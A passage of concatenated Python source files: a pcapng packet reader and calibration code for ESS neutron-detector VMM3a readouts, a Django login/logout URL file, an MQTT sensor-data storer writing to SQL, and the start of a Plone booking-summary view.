time.sleep(2)
self.Durations = np.round(Tstop-Tstart, decimals = 3)
def calculateTimeStampWithTDC(self,NSperClockTick,time_offset=0,time_slope=1):
self.timeStamp = self.timeCoarse + VMM3A_convertCalibrate_TDC_ns(self.TDC,NSperClockTick,time_offset,time_slope).TDC_ns
def checkIfCalibrationMode(self):
flag = False
if np.any(self.G0 == 1) :
flag = True
print('\n\t\033[1;33mWARNING: calibration latency mode found in READOUTS.\033[1;37m',end='')
time.sleep(1)
return flag
def removeCalibrationData(self):
print('--> removing latency calib data from readouts ...')
noCalibData = self.G0 == 0
self.Ring = self.Ring[noCalibData]
self.Fen = self.Fen[noCalibData]
self.VMM = self.VMM[noCalibData]
self.hybrid = self.hybrid[noCalibData]
self.ASIC = self.ASIC[noCalibData]
self.Channel = self.Channel[noCalibData]
self.ADC = self.ADC[noCalibData]
self.timeStamp = self.timeStamp[noCalibData]
self.timeCoarse = self.timeCoarse[noCalibData]
self.BC = self.BC[noCalibData]
self.OTh = self.OTh[noCalibData]
self.TDC = self.TDC[noCalibData]
self.GEO = self.GEO[noCalibData]
self.G0 = self.G0[noCalibData]
self.PulseT = self.PulseT[noCalibData]
self.PrevPT = self.PrevPT[noCalibData]
###############################################################################
###############################################################################
class checkInstrumentID():
def __init__(self, ID):
self.FREIAID = 72
self.EstiaID = 76
self.AMORID = 78
self.printa = True
if ID == self.FREIAID:
print('found Freia data stream')
elif ID == self.EstiaID:
print('found Estia data stream')
elif ID == self.AMORID:
print('found AMOR data stream')
else:
print('found some other data stream')
print('loading ... [0%]',end=' ')
self.printa = False
#################################################
class checkWhich_RingFenHybrid_InFile():
def __init__(self, filePathAndFileName,NSperClockTick):
pcap = pcapng_reader(filePathAndFileName, NSperClockTick, timeResolutionType = 'coarse', sortByTimeStampsONOFF = False)
self.readouts = pcap.readouts
temp = os.path.split(filePathAndFileName)
# filePath = temp[0]+'/'
self.fileName = temp[1]
def check(self):
print("\nRings, Fens and Hybrids in file: {}".format(self.fileName))
RingsInFile = np.unique(self.readouts.Ring)
cont = 0
for RR in RingsInFile:
# self.RFH['Ring'] = RR
selectRING = self.readouts.Ring == RR
Fens4Ring = self.readouts.Fen[selectRING]
Hybrids4Ring = self.readouts.hybrid[selectRING]
FensInRing = np.unique(Fens4Ring)
for FF in FensInRing:
selectFEN = Fens4Ring == FF
Hybrids4Fen = Hybrids4Ring[selectFEN]
HybridsInFen = np.unique(Hybrids4Fen)
for HH in HybridsInFen:
cont += 1
print("\tNo. {}: Ring {}, Fen {}, Hybrid {}".format(cont,int(RR),int(FF),int(HH)))
#################################################
class VMM3A():
def __init__(self, buffer, NSperClockTick):
# decode into little endian integers
PhysicalRing = int.from_bytes(buffer[0:1], byteorder='little')
self.Fen = int.from_bytes(buffer[1:2], byteorder='little')
self.Length = int.from_bytes(buffer[2:4], byteorder='little')
timeHI = int.from_bytes(buffer[4:8], byteorder='little')
timeLO = int.from_bytes(buffer[8:12], byteorder='little')
self.BC = int.from_bytes(buffer[12:14], byteorder='little')
OTADC = int.from_bytes(buffer[14:16], byteorder='little')
G0GEO = int.from_bytes(buffer[16:17], byteorder='little')
self.TDC = int.from_bytes(buffer[17:18], byteorder='little')
self.VMM = int.from_bytes(buffer[18:19], byteorder='little')
self.Channel = int.from_bytes(buffer[19:20], byteorder='little')
#######################
# IMPORTANT NOTE: phys ring is 0 and 1 for logical ring 0 etc. Always 12 logical rings
self.Ring = int(np.floor(PhysicalRing/2))
# self.Ring = PhysicalRing
#######################
self.ADC = OTADC & 0x3FF #extract only 10 LSB
self.OTh = OTADC >> 15 #extract only 1 MSB
self.G0 = G0GEO >> 7
self.GEO = G0GEO & 0x3F
self.ASIC = self.VMM & 0x1 #extract only LSB
self.hybrid = (self.VMM & 0xE) >> 1 #extract only 1110 and shift right by one
# if self.G0 == 0: # normal mode
# pass
# elif self.G0 == 1: # calibration mode
# pass
# in seconds
# self.timeCoarse = np.around(TimeHI*1.0 + TimeLO * timeResolution , decimals=9) # coarse time resolution
# print(type(timeLO))
# print(timeLO)
timeHIns = int(round(timeHI * 1000000000))
timeLOns = int(round(timeLO * NSperClockTick))
# print(type(timeLOns))
# print(timeLOns)
# self.timeStamp = self.timeHIns + self.timeLOns
self.timeCoarse = timeHIns + timeLOns
# self.timeStamp = timeHIns + timeLOns + VMM3A_convertCalibrate_TDC_ns(self.TDC,NSperClockTick).TDC_ns
# ((NSperClockTick*2*1.5 - self.TDC*60/255 - 0.0) * 1.0)
# self.timeStamp = TimeHI + TimeLO * timeResolution + VMM3A_convertCalibrate_TDCinSec(self.TDC,timeResolution,time_offset=0,time_slope=1).TDC_s
# self.timeStamp = self.timeCoarse + VMM3A_convertCalibrate_TDCinSec(self.TDC,timeResolution,time_offset=0,time_slope=1).TDC_s
# print('qui non funziona il caricare il time coarse e time lo maybe float, ed e a cnhe lento fai times tmap alla fine tutto insieme')
# self.timeStamp = 0
# self.timeStamp = self.timeCoarse + 100e-9
# print(self.timeCoarse,self.timeStamp)
# Corrected_time = (1.5*timeResolution*2 – TDC*60ns/255 – time_offset)*time_slope
# Complete_time = BC*timeResolution*2 + corrected_time
class VMM3A_convertCalibrate_TDC_ns():
def __init__(self,TDC,NSperClockTick,time_offset=0,time_slope=1):
# self.TDC = TDC
# self.NSperClockTick = NSperClockTick
self.pTAC = 60 # in ns
# def convert_ns(self):
# self.calibrate(time_offset=0, time_slope=1)
# def calibrate(self,time_offset,time_slope):
# time_offset in ns, time_slope adimensional
aboveLimit = TDC > 255
belowLimit = TDC < 0
if np.any(aboveLimit == True):
TDC[aboveLimit] = 255
elif np.any(belowLimit == True):
TDC[belowLimit] = 0
TDC_ns = np.around( ( (NSperClockTick*2*1.5 - TDC*self.pTAC/255 - time_offset) * time_slope ) )
self.TDC_ns = TDC_ns.astype('int64')
class VMM3A_calibrate_ADC():
def __init__(self,ADC,ADC_offset=0,ADC_slope=1):
ADC_calibrated = np.around(( ADC - ADC_offset ) * ADC_slope)
aboveLimit = ADC_calibrated > 1023
belowLimit = ADC_calibrated < 0
if np.any(aboveLimit == True):
ADC_calibrated[aboveLimit] = 1023
elif np.any(belowLimit == True):
ADC_calibrated[belowLimit] = 0
self.ADC_calibrated = ADC_calibrated.astype('int64')
###############################################################################
###############################################################################
class checkIfFileExistInFolder():
def __init__(self, filePathAndFileName):
if os.path.exists(filePathAndFileName) is False:
temp2 = os.path.split(filePathAndFileName)
filePath = temp2[0]+'/'
fileName = temp2[1]
print('\n \033[1;31m---> File: '+fileName+' DOES NOT EXIST \033[1;37m')
print('\n ---> in folder: '+filePath+' \n')
print(' ---> Exiting ... \n')
print('------------------------------------------------------------- \n')
sys.exit()
##################################################
class pcapng_reader():
def __init__(self, filePathAndFileName, NSperClockTick, timeResolutionType = 'fine', sortByTimeStampsONOFF = True):
self.readouts = readouts()
try:
# print('PRE-ALLOC method to load data ...')
self.pcapng = pcapng_reader_PreAlloc(filePathAndFileName,NSperClockTick,timeResolutionType)
self.pcapng.allocateMemory()
self.pcapng.read()
self.readouts = self.pcapng.readouts
except:
# print('\n... PRE-ALLOC method failed, trying APPEND method to load data ...')
print('\n... PRE-ALLOC method failed, exiting ...')
sys.exit()
# HERE IS FUTURE DEVEL IF NEEDED
# self.pcapng = pcapng_reader_slowAppend(filePathAndFileName)
# self.pcapng.read(timeResolutionType)
# self.readouts = self.pcapng.readouts
finally:
if sortByTimeStampsONOFF is True:
print('Readouts are sorted by TimeStamp')
self.readouts.sortByTimeStamps()
else:
print('Readouts are NOT sorted by TimeStamp')
self.readouts.calculateDuration()
##################################################
class pcapng_reader_PreAlloc():
def __init__(self, filePathAndFileName, NSperClockTick, timeResolutionType = 'fine'):
# number of decimals after comma in seconds, to round the PulseT and PRevPT: 6 means 1us rounding, etc...
# self.resolution = 9
# self.timeResolution = 11.25e-9 #s per tick for 88.888888 MHz
# self.timeResolution = 11.356860963629653e-9 #s per tick ESS for 88.0525 MHz
self.NSperClockTick = NSperClockTick
self.timeResolutionType = timeResolutionType
self.filePathAndFileName = filePathAndFileName
checkIfFileExistInFolder(self.filePathAndFileName)
temp2 = os.path.split(filePathAndFileName)
fileName = temp2[1]
self.fileSize = os.path.getsize(self.filePathAndFileName) #bytes
print('{} is {} kbytes'.format(fileName,self.fileSize/1000))
self.readouts = readouts()
#############################
self.debug = False
self.offset = 25 #bytes Num of bytes after the word (cookie) ESS = 0x 45 53 53
self.mainHeaderSize = 42 #bytes (14 bytes of Ethernet header, 20 bytes of IPv4 header, and 8 bytes of UDP header)
self.ESSheaderSize = 30 #bytes
self.headerSize = self.mainHeaderSize+self.ESSheaderSize #bytes (72 bytes)
self.singleReadoutSize = 20 #bytes
# self.numOfPacketsPerTransfer = 447
# self.expectedESSpacketSize = 72+NumOfReadoutsIN1PAcket*20 = max 9000bytes
# self.preallocLength = round(self.fileSize*1.2/self.expectedESSpacketSize)*self.numOfPacketsPerTransfer
#############################
self.counterPackets = 0
self.counterCandidatePackets = 0
self.counterValidESSpackets = 0
self.counterNonESSpackets = 0
self.counterEmptyESSpackets = 0
self.totalReadoutCount = 0
# def __del__(self):
# try:
# self.ff.close()
# except:
# pass
def dprint(self, msg):
if self.debug:
print("{}".format(msg))
def allocateMemory(self):
ff = open(self.filePathAndFileName, 'rb')
scanner = pg.FileScanner(ff)
packetsSizes = np.zeros((0),dtype='int64')
for block in scanner:
self.counterPackets += 1
self.dprint("packet {}".format(self.counterPackets))
try:
packetSize = block.packet_len
self.dprint("packetSize {} bytes".format(packetSize))
except:
self.dprint('--> other packet found No. {}'.format(self.counterPackets-self.counterCandidatePackets))
else:
self.counterCandidatePackets += 1
packetsSizes = np.append(packetsSizes,packetSize)
self.dprint('counterPackets {}, counterCandidatePackets {}'.format(self.counterPackets,self.counterCandidatePackets))
if self.debug:
overallSize = np.sum(packetsSizes)
self.dprint('overallSize {} bytes'.format(overallSize))
numOfReadoutsInPackets = (packetsSizes - self.headerSize)/self.singleReadoutSize #in principle this is 447 for every packet
# if negative there was a non ESS packetso length < 72bytes
# and if much bigger wee anyhowallocate morethan needed and remove zeros aftyerwards at the end
numOfReadoutsTotal = np.sum(numOfReadoutsInPackets[ numOfReadoutsInPackets >= 0])
self.preallocLength = round(numOfReadoutsTotal)
self.dprint('preallocLength {}'.format(self.preallocLength))
ff.close()
def read(self):
self.data = np.zeros((self.preallocLength,15), dtype='int64')
ff = open(self.filePathAndFileName, 'rb')
scanner = pg.FileScanner(ff)
overallDataIndex = 0
stepsForProgress = int(self.counterCandidatePackets/4)+1 # 4 means 25%, 50%, 75% and 100%
for block in scanner:
try:
packetLength = block.packet_len
packetData = block.packet_data
except:
self.dprint('--> other packet found')
else:
indexESS = packetData.find(b'ESS')
self.dprint('index where ESS word starts {}'.format(indexESS))
# it should be always 44 = 42+2
if indexESS == -1:
# this happens if it not an ESS packet
self.counterNonESSpackets += 1
else:
# there is an ESS packet but i can still be empty, i.e. 72 bytes only
self.counterValidESSpackets += 1
if self.counterValidESSpackets == 1:
checkInstrumentID(packetData[indexESS+3])
indexDataStart = indexESS + self.offset + 3 # this is 72 = 44+25+3
# give a warning if not 72, check that ESS cookie is always in the same place
if indexDataStart != self.headerSize:
print('\n \033[1;31mWARNING ---> ESS cookie is not in position 72! \033[1;37m')
ESSlength = int.from_bytes(packetData[indexESS+4:indexESS+6], byteorder='little') # bytes
PulseThigh = int.from_bytes(packetData[indexESS+8:indexESS+12], byteorder='little')*1000000000
PulseTlow = int.from_bytes(packetData[indexESS+12:indexESS+16], byteorder='little')*self.NSperClockTick
PrevPThigh = int.from_bytes(packetData[indexESS+16:indexESS+20], byteorder='little')*1000000000
PrevPTlow = int.from_bytes(packetData[indexESS+20:indexESS+24], byteorder='little')*self.NSperClockTick
# IMPORTANT if you do int round after sum is off, needs to be done before then sum hi and low
PulseThighR = int(round(PulseThigh))
PulseTlowR = int(round(PulseTlow))
PrevPThighR = int(round(PrevPThigh))
PrevPTlowR = int(round(PrevPTlow))
PulseT = PulseThighR + PulseTlowR
PrevPT = PrevPThighR + PrevPTlowR
readoutsInPacket = (packetLength - indexDataStart) / self.singleReadoutSize
# or alternatively
# readoutsInPacket = (ESSlength - self.ESSheaderSize) / self.singleReadoutSize
# ESSlength is only 30 if the packet is an ESS packet but empty= 72-42 =30
self.dprint('ESS packet length {} bytes, packetLength {} bytes, readouts in packet {}'.format(ESSlength, packetLength,readoutsInPacket))
if (packetLength - indexDataStart) == 0:
self.counterEmptyESSpackets += 1
self.dprint('empty packet No. {}'.format(self.counterEmptyESSpackets))
else:
if readoutsInPacket.is_integer() is not True:
print('\n \033[1;31mWARNING ---> something wrong with data bytes dimensions \033[1;37m')
break
else:
readoutsInPacket = int(readoutsInPacket)
self.totalReadoutCount += readoutsInPacket
for currentReadout in range(readoutsInPacket):
overallDataIndex += 1
indexStart = indexDataStart + self.singleReadoutSize * currentReadout
indexStop = indexDataStart + self.singleReadoutSize * (currentReadout + 1)
vmm3 = VMM3A(packetData[indexStart:indexStop], self.NSperClockTick)
index = overallDataIndex-1
self.data[index, 0] = vmm3.Ring
self.data[index, 1] = vmm3.Fen
self.data[index, 2] = vmm3.VMM
self.data[index, 3] = vmm3.hybrid
self.data[index, 4] = vmm3.ASIC
self.data[index, 5] = vmm3.Channel
self.data[index, 6] = vmm3.ADC
self.data[index, 7] = vmm3.BC
self.data[index, 8] = vmm3.OTh
self.data[index, 9] = vmm3.TDC
self.data[index, 10] = vmm3.GEO
self.data[index, 11] = vmm3.timeCoarse
self.data[index, 12] = PulseT
self.data[index, 13] = PrevPT
self.data[index, 14] = vmm3.G0 # if 1 is calibration
# self.data[index, 7] = vmm3.timeStamp
self.dprint(" \t Packet: {} ({} bytes), Readout: {}, Ring {}, FEN {}, VMM {}, hybrid {}, ASIC {}, Ch {}, Time Coarse {} ns, BC {}, OverTh {}, ADC {}, TDC {}, GEO {} " \
.format(self.counterValidESSpackets,ESSlength,currentReadout+1,vmm3.Ring,vmm3.Fen,vmm3.VMM,vmm3.hybrid,vmm3.ASIC,vmm3.Channel,vmm3.timeCoarse,vmm3.BC,vmm3.OTh,vmm3.ADC,vmm3.TDC,vmm3.GEO))
###########
if np.mod(self.counterValidESSpackets,stepsForProgress) == 0 or np.mod(self.counterValidESSpackets,stepsForProgress) == 0:
percents = int(round(100.0 * self.counterValidESSpackets / float(self.counterCandidatePackets), 1))
print('['+format(percents,'01d') + '%]',end=' ')
print('[100%]',end=' ')
self.dprint('\n All Packets {}, Candidates for Data {} --> Valid ESS {} (empty {}), NonESS {} '.format(self.counterPackets , self.counterCandidatePackets,self.counterValidESSpackets ,self.counterEmptyESSpackets,self.counterNonESSpackets))
#######################################################
# here I remove the rows that have been preallocated but no filled in case there were some packets big but no ESS
if self.preallocLength > self.totalReadoutCount:
datanew = np.delete(self.data,np.arange(self.totalReadoutCount,self.preallocLength),axis=0)
print('removing extra allocated length not used ...')
elif self.preallocLength < self.totalReadoutCount:
print('something wrong with the preallocation: allocated length {}, total readouts {}'.format(self.preallocLength,self.totalReadoutCount))
sys.exit()
elif self.preallocLength == self.totalReadoutCount:
datanew = self.data
cz = checkIfDataHasZeros(datanew)
datanew = cz.dataOUT
self.readouts.transformInReadouts(datanew)
# self.readouts.calculateTimeStamp(self.NSperClockTick)
if self.timeResolutionType == 'fine':
self.readouts.calculateTimeStampWithTDC(self.NSperClockTick)
elif self.timeResolutionType == 'coarse':
self.readouts.timeStamp = self.readouts.timeCoarse
flag = self.readouts.checkIfCalibrationMode()
if flag is True:
self.readouts.removeCalibrationData()
# self.readouts.timeStamp = self.readouts.timeCoarse + VMM3A_convertCalibrate_TDCinSec(self.readouts.TDC,timeResolution,time_offset=100e-9,time_slope=1).TDC_s
# self.readouts.TDC = VMM3A_convertCalibrate_TDCinSec(self.readouts.TDC,timeResolution,time_offset=100e-9,time_slope=1).TDC_s
print('\ndata loaded - found {} readouts - Packets: all {} (candidates {}) --> valid ESS {} (of which empty {}), nonESS {})'.format(self.totalReadoutCount, self.counterPackets,self.counterCandidatePackets,self.counterValidESSpackets ,self.counterEmptyESSpackets,self.counterNonESSpackets))
# print('\n')
ff.close()
class checkIfDataHasZeros():
def __init__(self, data):
self.dataIN = data
self.OriginalLength = np.shape(self.dataIN)[0]
datasum = np.sum(data,axis=1)
indexesIsNotZero = np.argwhere(datasum>0)
# self.trueLen = np.shape(indexesIsNotZero[:,0]>0)[0]
self.dataOUT = self.dataIN[indexesIsNotZero[:,0],:]
self.NewLength = np.shape(self.dataOUT)[0]
if self.NewLength != self.OriginalLength :
self.flag = True
print('---> removing zeros left in in data')
else :
self.flag = False
###############################################################################
###############################################################################
# NOTE THIS PART BELOW IS WITH APPEND METHOD IS SLOW BUT IT MIGHT BE NEEDED FOR SPECIAL CASES, IT NEEDS A FIX FOR THE FUTURE
# class pcapng_reader_slowAppend():
# def __init__(self, filePathAndFileName):
# if os.path.exists(filePathAndFileName) is False:
# temp2 = os.path.split(filePathAndFileName)
# filePath = temp2[0]+'/'
# fileName = [temp2[1]]
# print('\n \033[1;31m---> File: '+fileName+' DOES NOT EXIST \033[1;37m')
# print('\n ---> in folder: '+filePath+' \n')
# print(' ---> Exiting ... \n')
# print('------------------------------------------------------------- \n')
# sys.exit()
# self.ff = open(filePathAndFileName, 'rb')
# self.readouts = readouts()
# self.fileSize = os.path.getsize(filePathAndFileName) #bytes
# print('data is {} kbytes'.format(self.fileSize/1e3))
# self.debug = False
# self.offset = 25 #bytes Num of bytes after the word (cookie) ESS = 0x 45 53 53
# self.ESSheaderSize = 30 #bytes
# self.dataPacketLength = 20 #bytes
# # self.timeResolution = 11.25e-9 #s per tick
# self.timeResolution = 11.35686096362965e-9 #s per tick ESS
# self.numOfPacketsPerTransfer = 400
# # self.numOfPacketsPerTransfer = 447
# self.expectedESSpacketSize = self.numOfPacketsPerTransfer*self.dataPacketLength+self.ESSheaderSize #8970 bytes
# self.preallocLength = round(self.fileSize*1.2/self.expectedESSpacketSize)*self.numOfPacketsPerTransfer
# # I add a 20% *1.2 for safety
# self.packetCount = 0
# self.truePacketCount = 0
# self.nonESSPacketCount = 0
# self.totalReadoutCount = 0
# def __del__(self):
# try:
# self.ff.close()
# except:
# pass
# def dprint(self, msg):
# if self.debug:
# print("{}".format(msg))
# def read(self, timeResolutionType='fine'):
# self.timeResolutionType = timeResolutionType
# scanner = pg.FileScanner(self.ff)
# data = np.zeros((0,12), dtype='float64')
# for block in scanner:
# self.packetCount += 1
# readoutCount = 0
# try:
# packetLength = block.packet_len
# packetData = block.packet_data
# except:
# continue
# self.truePacketCount += 1
# self.dprint("packet {} - length {}".format(self.packetCount, packetLength))
# indexESS = packetData.find(b'ESS')
# if indexESS == -1:
# self.nonESSPacketCount += 1
# continue
# if self.truePacketCount == 1:
# checkInstrumentID(packetData[indexESS+3])
# indexDataStart = indexESS + 2 + self.offset + 1
# ESSlength = int.from_bytes(packetData[indexESS+4:indexESS+6], byteorder='little') # bytes
# # check that ESS is always in the same place
# # tempIndexDataStart.append(indexDataStart)
# readoutCount = (packetLength - indexDataStart) / self.dataPacketLength
# self.dprint("readoutCount {}".format(readoutCount))
# if readoutCount.is_integer() is not True:
# print('something wrong with data bytes dimensions')
# break
# else:
# readoutCount = int(readoutCount)
# self.totalReadoutCount += readoutCount
# for currentReadout in range(readoutCount):
# indexStart = indexDataStart + self.dataPacketLength * currentReadout
# indexStop = indexDataStart + self.dataPacketLength * (currentReadout + 1)
# vmm3 = VMM3A(packetData[indexStart:indexStop], self.timeResolution, self.timeResolutionType)
# # self.data.append(vmm3)
# # NOTE this append at every cycle is not efficient for speed so better to allocate the array and fill it, then append outside inner loop
# index = (self.truePacketCount-1)*self.numOfPacketsPerTransfer+currentReadout
# # print(vmm3.Channel)
# # vmm3.Ring
# temp = np.array([vmm3.Ring,vmm3.Fen,vmm3.VMM,vmm3.hybrid,vmm3.ASIC,vmm3.Channel,vmm3.ADC,vmm3.timeStamp,vmm3.BC,vmm3.OTh,vmm3.TDC,vmm3.GEO])
# data = np.concatenate((data,temp[None,:]),axis=0)
# del temp
# # data[index, 1] = vmm3.Fen
# # data[index, 2] = vmm3.VMM
# # data[index, 3] = vmm3.hybrid
# # data[index, 4] = vmm3.ASIC
# # data[index, 5] = vmm3.Channel
# # data[index, 6] = vmm3.ADC
# # data[index, 7] = vmm3.timeStamp
# # data[index, 8] = vmm3.BC
# # data[index, 9] = vmm3.OTh
# # data[index, 10] = vmm3.TDC
# # data[index, 11] = vmm3.GEO
# self.dprint(" \t Packet: {} ({} bytes), Readout: {}, Ring {}, FEN {}, VMM {}, hybrid {}, ASIC {}, Ch {}, Time {} s, BC {}, OverTh {}, ADC {}, TDC {}, GEO {} " \
# .format(self.truePacketCount,ESSlength,currentReadout+1,vmm3.Ring,vmm3.Fen,vmm3.VMM,vmm3.hybrid,vmm3.ASIC,vmm3.Channel,vmm3.timeStamp,vmm3.BC,vmm3.OTh,vmm3.ADC,vmm3.TDC,vmm3.GEO))
# ###########
# # check
# packetLength = readoutCount*self.dataPacketLength + self.ESSheaderSize # bytes
# if packetLength != ESSlength and self.truePacketCount == 1:
# print('something wrong with this packet: exp size {} bytes, found {} bytes.'.format(ESSlength,packetLength))
# roughNumOfPackets = round(self.fileSize/ESSlength)
# steps = int(roughNumOfPackets/4)+1
# if np.mod(self.truePacketCount,steps) == 0 or np.mod(self.truePacketCount,steps) == 0:
# percents = int(round(100.0 * self.truePacketCount / float(roughNumOfPackets), 1))
# print('['+format(percents,'01d') + '%]',end=' ')
# print('[100%]',end=' ')
# # here I remove the rows that have been preallocated but no filled
# # datanew = np.delete(data,np.arange(self.totalReadoutCount,self.preallocLength),axis=0)
# self.readouts.transformInReadouts(data)
# # check
# if data.shape[0] != self.totalReadoutCount:
# print('\nsomething wrong ... mismatch between data exp. length {} and what was read {}'.format(self.totalReadoutCount,self.readouts.Ring.shape[0]))
# print('\ndata loaded - found {} readouts ({} kbytes) - Packets: valid {}, nonESS {}, All {})'.format(self.totalReadoutCount,self.truePacketCount*ESSlength/1e3,self.truePacketCount,self.nonESSPacketCount,self.packetCount))
# self.__del__()
# return data
###############################################################################
###############################################################################
if __name__ == '__main__':
# parser = argparse.ArgumentParser()
# parser.add_argument("-f", metavar='file', help = "pcap file",
# type = str, default = "VMM3a_Freia.pcapng")
# parser.add_argument('-d', action='store_true', help = "add debug print")
tProfilingStart = time.time()
# arg = parser.parse_args()
# filePath = './'+"VMM3a.pcapng"
path = '/Users/francescopiscitelli/Desktop/dataPcapUtgard/'
# filePath = path+'pcap_for_fra.pcapng'
# filePath = path+'pcap_for_fra_ch2test.pcapng'
# filePath = path+'pcap_for_fra_ch2test_take2.pcapng'
# filePath = path+'pcap_for_fra_coinc.pcapng'
filePath = path+'freiatest.pcapng'
# filePath = path+'20211005_091349_morten.pcapng'
# path = '/Users/francescopiscitelli/Documents/PYTHON/MBUTYcap/data/'
# filePath = path+'VMM3a_Freia.pcapng'
# pr = pcapng_reader(filePath,timeResolutionType='fine')
# # pr.debug = True
# # pr.ret()
# # data = pr.data
#
# pr = pcapng_reader_PreAlloc(filePath)
# # pr.debug = True
# pr.allocateMemory()
# pr.read(timeResolutionType='fine')
# pcap = pcapng_reader(filePath,timeResolutionType='fine', sortByTimeStampsONOFF = True)
# readouts = pcap.readouts
# readouts.sortByTimeStamps()
# readoutsArray = readouts.concatenateReadoutsInArrayForDebug()
#
# ppp = plo.plottingReadouts(vmm3, config)
# ppp.plotChRaw(parameters.cassettes.cassettes)
# ppp.plotTimeStamps(parameters.cassettes.cassettes)
# cc= checkWhich_RingFenHybrid_InFile(filePath)
# aa = cc.check()
# readouts = cc.readouts
# r
NSperClockTick = 11.356860963629653 #ns per tick ESS for 88.0525 MHz
cc = checkWhich_RingFenHybrid_InFile(filePath,NSperClockTick).check()
# pcap = pcapng_reader_PreAlloc(filePath,NSperClockTick)
# pcap.allocateMemory()
# pcap.read()
# pcap = pcapng_reader(filePath, NSperClockTick, timeResolutionType = 'fine', sortByTimeStampsONOFF = False )
# readouts = pcap.readouts
# readoutsArray = readouts.concatenateReadoutsInArrayForDebug()
# tdcs = VMM3A_convertCalibrate_TDCinSec(readouts.TDC, NSperClockTick).TDC_ns
# timeS = readouts.timeHIs + 100e-9
# timeDIff = readouts.timeStamp - readouts.timeHIns
# - readouts.timeLOns*1e-9
# aa = np.concatenate((readouts.timeStamp[:,None],readouts.timeHIs[:,None],readouts.timeLOns[:,None]*1e-9,tdcs[:,None],timeDIff[:,None]),axis=1)
# aa = pr.d
# bb = pr.e
# aaa = aa[446900:,5:9]
# bbb = bb[446900:,5:9]
# for k in range(446900,447000,1):
# print(" \t Ring {}, FEN {}, VMM {}, hybrid {}, ASIC {}, Ch {}, Time {} s, BC {}, OverTh {}, ADC {}, TDC {}, GEO {} " \
# .format(vmm3.Ring[k],vmm3.Fen[k],vmm3.VMM[k],vmm3.hybrid[k],vmm3.ASIC[k],vmm3.Channel[k],vmm3.timeStamp[k],vmm3.BC[k],vmm3.OTh[k],vmm3.ADC[k],vmm3.TDC[k],vmm3.GEO[k]))
tElapsedProfiling = time.time() - tProfilingStart
print('\n Data Loading Completed in %.2f s' % tElapsedProfiling) |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^login/$', views.userlogin, name='login'),
url(r'^logout/$', views.userlogout, name='logout')
]
|
#!/usr/bin/env python3
import argparse
import logging
import time
import platform
import math
import re
import json
import iso8601
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql import table, column, select, update
from datetime import datetime
import paho.mqtt.client as mqtt
def main():
logging.basicConfig()
logger = logging.getLogger('storer')
parser = argparse.ArgumentParser(prog="storer")
parser.add_argument('--debug', '-d',
action='store_const',
const=logging.DEBUG,
dest='logging')
parser.add_argument('--quiet', '-q',
action='store_const',
const=logging.WARNING,
dest='logging')
parser.add_argument('--database', type=str,
default="sqlite:///database.sqlite")
parser.add_argument('--broker', '-b', default="localhost", type=str)
parser.add_argument('--broker-port', '-p', default=1883, type=int)
parser.add_argument('--broker-user', '-U', type=str)
parser.add_argument('--broker-password', '-P', type=str)
parser.set_defaults(logging=logging.INFO)
args = parser.parse_args()
logging.getLogger().setLevel(args.logging)
logger.debug("args=%r", args)
engine = create_engine(args.database)
new_session = sessionmaker(bind=engine)
logger.debug("engine=%r new_session=%r", engine, new_session)
client = mqtt.Client()
if args.broker_user:
client.username_pw_set(args.broker_user, args.broker_password)
logger.debug("client=%r", client)
client.connect(args.broker, args.broker_port)
def on_message(client, data, message):
logger.debug("on_message: message.topic=%r message.payload=%r",
message.topic, message.payload)
m = re.match(r'node/(\d+)/(.*)', message.topic)
assert m
device_id = int(m.group(1))
path = m.group(2)
logger.debug("node id=%d path=%r", device_id, path)
if path == 'active':
logger.debug("node active mark")
engine.execute('update devices set last_active = ? where id = ?',
message.payload, device_id)
elif path[0:7] == 'sensor/':
payload = json.loads(message.payload.decode('utf-8'))
device_type = path[7:]
logger.debug("sensor type=%r", type)
sensor_id, = engine.execute(
'select id from sensors where device_id = ? and type = ?',
device_id, device_type).first()
logger.debug("sensor id=%r", sensor_id)
engine.execute('insert into measurements (device_id, sensor_id, '
'sensed_time, stored_time, value) '
'values (?, ?, ?, ?, ?)',
device_id,
sensor_id,
iso8601.parse_date(payload['time']).isoformat(),
datetime.now().isoformat(),
float(payload['value']))
logger.info("%d.%d @ %s = %-10s (%s)",
device_id, sensor_id,
iso8601.parse_date(payload['time']),
float(payload['value']), device_type)
def on_connect(client, userdata, flags, rc):
logger.info("Connected")
def on_disconnect(client, userdata, rc):
logger.info("Disconnected")
client.on_connect = on_connect
client.on_message = on_message
client.subscribe('node/+/#')
logger.info("storer: Reading from %s:%s, storing to %s",
args.broker, args.broker_port, args.database)
client.loop_forever()
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
import logging
logger = logging.getLogger('[sm.idonethis]')
from datetime import datetime
from datetime import timedelta
from zope.component import getMultiAdapter
# from zope.publisher.interfaces import NotFound
import plone.api
from plone.memoize import view
from Products.Five.browser import BrowserView
# from Products.CMFPlone.utils import safe_unicode
from Products.statusmessages.interfaces import IStatusMessage
from ... import _
from ... import api
from ... import mail_utils
from ...utils import LazyList
class View(BrowserView):
""" iDoneThis
"""
DATE_FORMAT = '%d/%m/%Y'
show_form = True
default_send_to = 'Team <team@abstract.it>'
@property
def today(self):
return datetime.now()
@property
def current_date(self):
# default to the day before today
dt = self.today - timedelta(1)
if self.request.get('by_date'):
dt = self.request.get('by_date')
dt = datetime.strptime(dt, self.DATE_FORMAT)
return dt
@property
def current_date_display(self):
return self.current_date.strftime(self.DATE_FORMAT)
def date_range(self, dt):
data = [
dt.year,
dt.month,
dt.day
]
start = data + [0, 0]
stop = data + [23, 59]
return (datetime(*start), datetime(*stop))
@property
def query(self):
date_query = self.date_range(self.current_date)
query = {
'from_date': date_query[0],
'to_date': date_query[1],
}
return query
def formatter(self, booking):
helpers = getMultiAdapter(
(booking, self.request),
name="helpers"
)
info = helpers.info(user_details=False,
drop_refs_links=True,
minimal=True)
return info
@view.memoize
def get_bookings(self):
return api.booking.get_bookings(**self.query)
def data(self):
users = {}
bookings = {}
for booking in self.get_bookings():
if not booking.story and not booking.project:
continue
if booking.owner not in users:
user_info = api.users.get_user_details(self.context,
booking.owner)
users[booking.owner] = user_info
bookings[booking.owner] = LazyList(
[], format_method=self.formatter)
bookings[booking.owner].append(booking)
return {
'users': sorted(users.itervalues(), key=lambda x: x.fullname),
'bookings': bookings,
}
class SendEmail(View):
redirect = True
def __call__(self):
if self.request.get('send_email'):
return self.send_email()
return "confirm send by providing `send_email` key"
def send_email(self):
view = self.context.restrictedTraverse('@@idonethis-content')
bookings = view.get_bookings()
